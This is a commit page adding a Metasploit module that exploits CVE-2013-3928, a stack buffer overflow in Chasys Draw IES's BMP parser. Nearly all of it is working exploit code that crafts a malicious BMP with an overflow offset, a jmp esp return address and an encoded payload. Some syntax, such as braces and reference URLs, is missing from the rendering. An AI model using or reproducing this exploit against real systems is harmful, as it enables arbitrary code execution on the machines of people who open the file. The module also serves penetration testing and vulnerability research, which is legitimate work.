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Add module for CVE-2013-3928
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jvazquez-r7 committed Aug 12, 2013
1 parent 4480dc3 commit b3f229f
Showing 1 changed file with 99 additions and 0 deletions.
99 changes: 99 additions & 0 deletions modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb
Original file line number Diff line number Diff line change
@@ -0,0 +1,99 @@
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT

def initialize(info={})
'Name' => "Chasys Draw IES Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow vulnerability found in Chasys Draw IES
(version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while
parsing BMP files, where the ReadFile function is used to store user provided data
on the stack in a insecure way. It results in arbitrary code execution under the
context of the user viewing a specially crafted BMP file. This module has been
tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7
'License' => MSF_LICENSE,
'Author' =>
'Christopher Gabriel', # Vulnerability Discovery
'Longinos Recuero Bustos', # PoC
'Javier \'soez\'', # PoC
'juan vazquez' # Metasploit
'References' =>
[ 'CVE', '2013-3928' ],
[ 'BID', '61463' ],
[ 'URL', '' ],
[ 'URL', '' ]
'Payload' =>
'Space' => 21112, # Indeed there is more space available on the stack, just limited by the trigger
'DisableNops' => true
'Platform' => 'win',
'Targets' =>
[ 'Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1',
'Offset' => 65536,
'Ret' => 0x10005fd3 # jmp esp # from flt_BMP.dll v4.10.1.0
'Privileged' => false,
'DisclosureDate' => "Jul 26 2013",
'DefaultTarget' => 0))

['FILENAME', [ true, 'The file name.', 'msf.bmp']),
], self.class)


def exploit

bof = rand_text(target['Offset'])
bof << [target.ret].pack("V")
bof << payload.encoded

bitmap_header = ""
bitmap_header << [0x28].pack("V") # HeaderSize
bitmap_header << [0x4a3].pack("V") # Width # Used to trigger the overflow
bitmap_header << [0x1].pack("V") # Height
bitmap_header << [0x9].pack("v") # Planes # Used to trigger the overflow
bitmap_header << [0x41].pack("v") # BitCount # Used to trigger the overflow
bitmap_header << [0x0].pack("V") # Compression
bitmap_header << [bof.length].pack("V") # SizeImage
bitmap_header << [0x0].pack("V") # PelsPerMeterX
bitmap_header << [0x0].pack("V") # PelsPerMeterY
bitmap_header << [0x0].pack("V") # ClrUse
bitmap_header << [0x0].pack("V") # ClrImportant

total_size = bof.length + bitmap_header.length + 14 # 14 => file header length

file_header = ""
file_header << "BM" # Signature
file_header << [total_size].pack("V") # Size
file_header << [0].pack("V") # Reserved
file_header << [0x36].pack("V") # BitsOffsets

bmp = file_header + bitmap_header + bof

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